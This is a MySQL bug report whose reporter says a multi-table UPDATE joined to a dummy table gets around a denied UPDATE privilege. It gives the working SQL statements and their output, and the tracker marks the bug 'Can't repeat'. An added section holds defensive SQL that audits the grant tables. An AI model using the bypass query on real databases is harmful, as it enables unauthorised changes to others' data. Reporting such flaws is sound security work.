Bug #6872 cross-database update evades permissions
Submitted: 29 Nov 2004 10:55
Modified: 29 Nov 2004 15:18
Reporter: Tom Cunningham
Status: Can't repeat
Category: MySQL Server
Severity: S1 (Critical)
Version: 4.0.18-max
OS: Linux (SuSe 8 (I think))
Assigned to:
CPU Architecture: Any

[29 Nov 2004 10:55] Tom Cunningham
Description:
Can get around the non-update permissions by doing a cross-database join.

How to repeat:
(1) this query fails, and *should* fail.

mysql> update ss1.customers set title='Mr' where id=107581;
ERROR 1044: Access denied for user: 'sdkain@%' to database 'ss1'

(2) these queries work, and *shouldn't* work.

mysql> create table tom_test (tom int);
Query OK, 0 rows affected (0.02 sec)

mysql> update ss1.customers left join tom_test on tom=1 set title='Mr' where id=107581;
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0
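
A privilege audit that can be run alongside the steps above, as an added example that is not part of the original report. It lists every grant level at which the account from the error message could hold UPDATE on ss1.customers. It assumes an administrative session that can read the mysql grant tables; the account, database and table names are the ones shown in the report.

```sql
-- Added example, not from the original report.
-- Run as an administrative account with SELECT on the mysql database.

-- 1. Grants as the server itself reports them for the account.
SHOW GRANTS FOR 'sdkain'@'%';

-- 2. Global level: Update_priv = 'Y' here applies to every database,
--    including ss1. All Host rows are listed because more than one
--    may exist for the same user name.
SELECT Host, User, Update_priv
FROM mysql.user
WHERE User = 'sdkain';

-- 3. Database level: the Db column may hold wildcard patterns
--    (% and _), so list every row for the user and read the patterns
--    instead of filtering on Db = 'ss1'.
SELECT Host, Db, User, Update_priv
FROM mysql.db
WHERE User = 'sdkain';

-- 4. Table level: Table_priv is a SET; look for 'Update' in it.
SELECT Host, Db, User, Table_name, Table_priv, Column_priv
FROM mysql.tables_priv
WHERE User = 'sdkain'
  AND Db = 'ss1'
  AND Table_name = 'customers';

-- 5. Column level: UPDATE may be granted on single columns, such as
--    the title column changed in step (2).
SELECT Host, Db, User, Table_name, Column_name, Column_priv
FROM mysql.columns_priv
WHERE User = 'sdkain'
  AND Db = 'ss1'
  AND Table_name = 'customers';
```

If none of these result sets shows UPDATE for the account, the multi-table statement in step (2) is expected to be refused with the same access-denied error as the statement in step (1).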